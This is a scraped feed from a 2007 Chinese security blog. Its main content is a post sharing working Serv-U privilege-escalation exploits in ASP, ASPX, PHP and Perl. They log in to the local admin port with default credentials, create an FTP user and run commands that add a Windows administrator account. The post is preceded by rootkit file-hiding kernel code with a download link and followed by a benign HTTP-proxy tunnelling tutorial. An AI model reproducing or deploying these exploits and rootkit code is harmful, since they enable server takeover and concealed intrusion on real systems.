        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);
        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);

        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)
        {
            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))
            {
                memset((PVOID)currIndxEntry->FileName, 0, 18);

                if(currPosition == 0)
                {
                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;
                    break;
                }

                preIndxEntry->Size += currIndxEntry->Size;

                break;
            }

            currPosition += currIndxEntry->Size;
            preIndxEntry = currIndxEntry;
            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);
        }
    }
}

   My level is limited; everyone is welcome to exchange ideas with me.

References:

[1] - "NTFS Documentation"
[2] - Azy, "IceSword & Rootkit Unhooker driver analysis"

---------

About AK922 (AzyKit): an RK I wrote that implements only file hiding; it can bypass every ARK mentioned in this article.
Download @ <a target=_blank><u><font color=#0000ff>http://www.wiiupload.net/sf/65b4e75ec4</font></u></a>

<div align=right><a style="text-decoration:none;" href="http://www.shnenglu.com/elva/" target="_blank">叶子</a> 2007-10-12 11:58 <a href="http://www.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback" target="_blank" style="text-decoration:none;">Post a comment</a></div>]]></description></item><item><title>Sharing Serv-U exploitation scripts (asp/aspx/php/perl) http://www.shnenglu.com/elva/archive/2007/08/04/29350.html叶子叶子Sat, 04 Aug 2007 07:17:00 GMThttp://www.shnenglu.com/elva/archive/2007/08/04/29350.htmlhttp://www.shnenglu.com/elva/comments/29350.htmlhttp://www.shnenglu.com/elva/archive/2007/08/04/29350.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/29350.htmlhttp://www.shnenglu.com/elva/services/trackbacks/29350.html
ASP


<%
'Serv-U ASP privilege escalation program
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if  not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case action
case 1
    set a=Server.CreateObject("Microsoft.XMLHTTP")
    a.open "GET", "    a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
    set session("a")=a
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="2"></form>
<script language="javascript">
document.write('<center>Connecting to 127.0.0.1:<%=port%>, username: <%=user%>, password: <%=pass%>...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 2
    set b=Server.CreateObject("Microsoft.XMLHTTP")
    b.open "GET", "
    b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
%>
<form method="post" name="goldsun">
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
<input name="action" type="hidden" id="action" value="3"></form>
<script language="javascript">
document.write('<center>Escalating privileges, please wait...<center>');
setTimeout("document.all.goldsun.submit();",4000);
</script>
<%
case 3
    set c=Server.CreateObject("Microsoft.XMLHTTP")
    c.open "GET", "
    c.send loginuser & loginpass & mt & deldomain & quit
    set session("c")=c
%>
<center>Escalation finished; the following command was executed:<br><font color=red><%=cmd%></font><br><br>
<input type=button value=" Back " onClick="location.href='<%=gname()%>';">
</center>
<%
case else
on error resume next
    set a=session("a")
    set b=session("b")
    set c=session("c")
    a.abort
    Set a = Nothing
    b.abort
    Set b = Nothing
    c.abort
    Set c = Nothing
%>
<center><form method="post" name="goldsun">
<table width="494" height="163" border="1" cellpadding="0" cellspacing="1" bordercolor="#666666">
  <tr align="center" valign="middle">
    <td colspan="2">Serv-U privilege escalation, ASP version, Goldsun[at]84823714</td>
  </tr>
  <tr align="center" valign="middle">
    <td width="100">Username:</td>
    <td width="379"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>Password:</td>
    <td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>Port:</td>
    <td><input name="port" type="text" id="port" value="43958"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>System path:</td>
    <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
  </tr>
  <tr align="center" valign="middle">
    <td>Command:</td>
    <td><input name="c" type="text" id="c" value="cmd /c net user goldsun love /add & net localgroup administrators goldsun /add" size="50"></td>
  </tr>
 
  <tr align="center" valign="middle">
    <td colspan="2"><input type="submit" name="Submit" value="Submit">
      <input type="reset" name="Submit2" value="Reset">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table></form></center>
<% end select
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
 gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>


ASPX


<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub


Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- insert content here -->
</p>
</form>
</body>
</html>


PHP


<?php
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  $sendbuf = "";
  $recvbuf = "";
  $domain = "-SETDOMAIN\r\n".
      "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
      "-TZOEnable=0\r\n".
      " TZOKey=\r\n";
  $adduser = "-SETUSERSETUP\r\n".
      "-IP=0.0.0.0\r\n".
      "-PortNo=2121\r\n".
      "-User=Will_Be\r\n".
      "-Password=Will_Be\r\n".
      "-HomeDir=c:\\\r\n".
      "-LoginMesFile=\r\n".
      "-Disable=0\r\n".
      "-RelPaths=1\r\n".
      "-NeedSecure=0\r\n".
      "-HideHidden=0\r\n".
      "-AlwaysAllowLogin=0\r\n".
      "-ChangePassword=0\r\n".
      "-QuotaEnable=0\r\n".
      "-MaxUsersLoginPerIP=-1\r\n".
      "-SpeedLimitUp=0\r\n".
      "-SpeedLimitDown=0\r\n".
      "-MaxNrUsers=-1\r\n".
      "-IdleTimeOut=600\r\n".
      "-SessionTimeOut=-1\r\n".
      "-Expire=0\r\n".
      "-RatioUp=1\r\n".
      "-RatioDown=1\r\n".
      "-RatiosCredit=0\r\n".
      "-QuotaCurrent=0\r\n".
      "-QuotaMaximum=0\r\n".
      "-Maintenance=None\r\n".
      "-PasswordType=Regular\r\n".
      "-Ratios=None\r\n".
      " Access=c:\\|RELP\r\n";
  $deldomain="-DELETEDOMAIN\r\n".
      "-IP=0.0.0.0\r\n".
      " PortNo=2121\r\n";
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Exploit ...<br>";
  echo "**********************************************************<br>";
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Delete Domain ...<br>";
  echo "**********************************************************<br>";
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  fclose($sock);
  fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>

<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command :
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="Submit">
<input type="reset" name="Submit" value="Reset">
</form>
</body>
</html>


Perl
Perl's default installation path is C:\Perl.
Then run: perl <path to your .pl file>
From a webshell the path looks like this:
C:\perl\bin\perl <path to your .pl file>
#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';


use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST<br><br>";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";


@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;


叶子 2007-08-04 15:17 Post a comment
]]>
Symantec 核心(j)驱动 symtdi.sys 本地权限提升漏洞http://www.shnenglu.com/elva/archive/2007/07/20/28428.html叶子叶子Fri, 20 Jul 2007 04:15:00 GMThttp://www.shnenglu.com/elva/archive/2007/07/20/28428.htmlhttp://www.shnenglu.com/elva/comments/28428.htmlhttp://www.shnenglu.com/elva/archive/2007/07/20/28428.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/28428.htmlhttp://www.shnenglu.com/elva/services/trackbacks/28428.html阅读全文

叶子 2007-07-20 12:15 发表评论
]]>
Rav 核心(j)驱动 memscan.sys 本地权限提升漏洞http://www.shnenglu.com/elva/archive/2007/07/20/28427.html叶子叶子Fri, 20 Jul 2007 04:14:00 GMThttp://www.shnenglu.com/elva/archive/2007/07/20/28427.htmlhttp://www.shnenglu.com/elva/comments/28427.htmlhttp://www.shnenglu.com/elva/archive/2007/07/20/28427.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/28427.htmlhttp://www.shnenglu.com/elva/services/trackbacks/28427.html阅读全文

叶子 2007-07-20 12:14 发表评论
]]>
Linux Kernel do_mremap VMA本地权限提升漏洞http://www.shnenglu.com/elva/archive/2007/06/01/25237.html叶子叶子Thu, 31 May 2007 19:10:00 GMThttp://www.shnenglu.com/elva/archive/2007/06/01/25237.htmlhttp://www.shnenglu.com/elva/comments/25237.htmlhttp://www.shnenglu.com/elva/archive/2007/06/01/25237.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/25237.htmlhttp://www.shnenglu.com/elva/services/trackbacks/25237.html阅读全文

叶子 2007-06-01 03:10 发表评论
]]>
Kaspersky Anti-Virus remote arbitrary file deletion vulnerability: analysis and exploit code
叶子, Thu, 31 May 2007 12:44:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/31/25224.html

Logging 3389 (Remote Desktop) logons with a command batch script
叶子, Wed, 23 May 2007 17:50:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/24/24732.html
Determining whether the current user is a system administrator
叶子, Sun, 13 May 2007 16:56:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/14/24080.html
An executable file modifying itself under Windows 2000
叶子, Sun, 13 May 2007 16:55:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/14/24079.html
The first C source for user cloning that works fully under Windows 2000 and 2003 (runnable directly from a webshell)
叶子, Sun, 13 May 2007 16:49:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/14/24078.html
MS Windows GDI Local Privilege Escalation Exploit (MS07-017)
叶子, Tue, 08 May 2007 08:49:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/08/23634.html
Blaster worm source code with detailed explanation
叶子, Tue, 08 May 2007 08:43:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/08/23633.html
HTTP Tunneling
叶子, Sun, 06 May 2007 08:51:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/06/23526.html

Introduction

HTTP Tunneling

HTTP is a text-based protocol for retrieving Web pages through a Web browser. On most LAN connections you sit behind a proxy server, which runs an HTTP proxy on some defined port; in Internet Explorer's Connection options you enter it under LAN settings. Because that proxy speaks a text-based protocol, it seems you can only get HTTP data from the outside network. There is, however, a small loophole that lets you pass through the HTTP proxy, connect to the outside world and exchange data in a binary protocol, or even a protocol of your own: HTTPS.

HTTPS Explanation

In HTTPS, data is transferred between browser and server in encrypted form. It is a binary protocol, so when it passes through a proxy the proxy understands none of it; it simply opens a binary stream and lets server and client exchange data. That same mechanism lets a program connect to any server the proxy permits and exchange arbitrary data: the proxy only sees what looks like a secure HTTP session.

For HTTPS, your browser connects to the proxy server and sends:

CONNECT neurospeech.com:443 HTTP/1.0<CR><LF>
Host: neurospeech.com:443<CR><LF>
[... other HTTP header lines ending with <CR><LF>, if required]
<CR><LF>    // Last empty line

The proxy server treats this as an HTTP secure session and opens a binary stream to the requested server and port. If the connection is established, the proxy server returns the following response:

HTTP/1.0 200 Connection Established<CR><LF>
[... other HTTP header lines ending with <CR><LF>; ignore all of them]
<CR><LF>    // Last empty line

Now, the browser is connected to the end server and can exchange data in both a binary and secure form.

How to Do This

Now it is your program's turn to do toward the proxy server exactly what Internet Explorer does for secure HTTP:

  1. Connect to the proxy server first.
  2. Issue CONNECT Host:Port HTTP/1.1<CR><LF>. (With HTTP/1.1 a Host: Host:Port<CR><LF> header line is required; the HTTP/1.0 form used in the sample code may omit it.)
  3. Issue <CR><LF>.
  4. Wait for a line of response. If it contains HTTP/1.X 200, the connection is successful; any other status means the proxy refused the tunnel.
  5. Read further lines of response until you receive an empty line.
  6. Now you are connected to the outside world through the proxy. Do any data exchange you want.
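The CONNECT exchange from the six steps above, written out as an added example that is not part of the original article or its socket library: the request a client sends to the proxy, and a parser for the proxy's status line and header block, done as pure string handling so it can be exercised offline against constructed proxy replies. The function names (build_connect_request, parse_connect_response, tunnel_established) and the sample replies are my own assumptions. Beyond the article's happy path it handles two things a real client must get right: any non-2xx status (a 403 for a target port the proxy does not allow, a 407 asking for proxy credentials) aborts instead of falling through to the application protocol, and bytes that arrive after the blank line are kept, because a buffered read may already contain the first bytes of the tunnelled protocol. On the proxy side, this status line is also where CONNECT targets are normally restricted to port 443 and logged.

```cpp
// Added example, not from the original article: the HTTP CONNECT handshake as
// plain string handling, so request building and response parsing can be
// exercised offline against constructed proxy replies.
#include <cctype>
#include <iostream>
#include <string>

// Steps 2 + 3: the request the client sends to the proxy for host:port.
// HTTP/1.1 is used here, so the Host header is mandatory (RFC 7230 section 5.4);
// the trailing empty line terminates the request.
std::string build_connect_request(const std::string& host, int port) {
    std::string target = host + ":" + std::to_string(port);
    return "CONNECT " + target + " HTTP/1.1\r\n"
           "Host: " + target + "\r\n"
           "\r\n";
}

struct ConnectResult {
    int status = 0;            // numeric code from the status line
    std::string reason;        // reason phrase, e.g. "Connection Established"
    size_t header_bytes = 0;   // bytes used by status line + headers + empty line
};

// Steps 4 + 5: parse the proxy's reply. Returns false while the header block is
// still incomplete (no terminating empty line yet) or the status line is
// malformed. Bytes beyond out.header_bytes already belong to the tunnelled
// protocol and must be handed to that protocol's reader, not discarded.
bool parse_connect_response(const std::string& buf, ConnectResult& out) {
    size_t end = buf.find("\r\n\r\n");
    if (end == std::string::npos) return false;
    size_t eol = buf.find("\r\n");
    std::string status_line = buf.substr(0, eol);
    // Status line shape: HTTP/1.x SP 3DIGIT [SP reason-phrase]
    if (status_line.compare(0, 5, "HTTP/") != 0) return false;
    size_t sp = status_line.find(' ');
    if (sp == std::string::npos || sp + 4 > status_line.size()) return false;
    std::string code = status_line.substr(sp + 1, 3);
    for (char c : code)
        if (!std::isdigit(static_cast<unsigned char>(c))) return false;
    out.status = std::stoi(code);
    out.reason = (sp + 4 < status_line.size()) ? status_line.substr(sp + 5) : "";
    out.header_bytes = end + 4;
    return true;
}

// Step 4's check: only a 2xx status means the proxy opened the tunnel. 403
// (target not allowed) and 407 (proxy authentication required) are the usual
// refusals and must abort the session rather than continue as if connected.
bool tunnel_established(const ConnectResult& r) {
    return r.status >= 200 && r.status < 300;
}

int main() {
    std::cout << build_connect_request("mail.example.com", 25);

    // Constructed proxy reply: 200, followed by the first bytes of an SMTP
    // banner that happened to arrive in the same read.
    std::string reply = "HTTP/1.0 200 Connection Established\r\n"
                        "Proxy-Agent: example-proxy\r\n"
                        "\r\n"
                        "220 mail.example.com ESMTP\r\n";
    ConnectResult r;
    if (parse_connect_response(reply, r) && tunnel_established(r))
        std::cout << "tunnel open (" << r.reason << "); first tunnelled bytes: "
                  << reply.substr(r.header_bytes);

    // Constructed refusal: this proxy does not allow CONNECT to port 25.
    std::string refused = "HTTP/1.1 403 Forbidden\r\n\r\n";
    if (parse_connect_response(refused, r) && !tunnel_established(r))
        std::cout << "proxy refused: " << r.status << " " << r.reason << "\n";
    return 0;
}
```

The parser deliberately stops at the blank line instead of reading "until the socket is quiet": the remainder of the buffer is the tunnelled protocol's data, and the article's line-by-line reads only avoid this problem because each read returns exactly one CRLF-terminated line.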

Sample Source Code

  // You need to connect to mail.yahoo.com on port 25
  // through a proxy on 192.0.1.1, HTTP proxy port 4480.
  // CSocketClient is a socket wrapper class.
  // Applying operator << to a CString writes the CString
  // to the socket followed by CRLF.
  // Applying operator >> to a CString receives one line of
  // response from the socket, up to CRLF.
  try
  {
      CString Request, Response;
      CSocketClient Client;
      Client.ConnectTo("192.0.1.1", 4480);
      // Issue CONNECT command
      Request = "CONNECT mail.yahoo.com:25 HTTP/1.0";
      Client << Request;
      // Issue the empty line that ends the request headers
      Request = "";
      Client << Request;
      // Receive the status line from the proxy
      Client >> Response;
      // Skip the HTTP version
      int n = Response.Find(' ');
      Response = Response.Mid(n + 1);
      // Only a 200 status means the tunnel is open
      if (Response.Left(3) != "200")
      {
          // Connection refused by the HTTP proxy server: stop here,
          // the remaining lines are an error response, not SMTP
          AfxMessageBox(Response);
          return;
      }
      // Read response header lines until an empty line is received
      do
      {
          Client >> Response;
          if (Response.IsEmpty())
              break;
      } while (true);
      // Now connected to mail.yahoo.com:25
      // Do the SMTP protocol from here on..
  }
  catch (CSocketException * pE)
  {
      pE->ReportError();
  }

Library Source Code

The Dns.h file contains all DNS-related source code. It uses the other headers SocketEx.h, SocketClient.h, and NeuroBuffer.h.

CSocketEx

A wrapper class around the socket functions. (CSocket is very heavy and unreliable if you do not know exactly how it works.) All the functions have the same names as in CSocket, so you can use this class directly.

CSocketClient

Derived from CSocketEx; throws proper exceptions carrying the Winsock error details. It defines two operators, >> and <<, for easy sending and receiving, and converts between network and host byte order where required.

CHttpProxySocketClient

Derived from CSocketClient. Call SetProxySettings(ProxyServer, Port) to set the proxy, then connect to the desired host and port as usual. The ConnectTo method is overridden and implements the HTTP proxy CONNECT protocol for you, so you get the connection without any hassle.

How to Use CHttpProxySocketClient

  // e.g. You need to connect to mail.yahoo.com on port 25
  // through a proxy on 192.0.1.1, HTTP proxy port 4480.
  // CHttpProxySocketClient performs the CONNECT handshake itself.
  // Applying operator << to a CString writes the CString
  // to the socket followed by CRLF.
  // Applying operator >> to a CString receives one line of
  // response from the socket, up to CRLF.
  try
  {
      CHttpProxySocketClient Client;
      Client.SetProxySettings("192.0.1.1", 4480);
      // Connect to server mail.yahoo.com on port 25
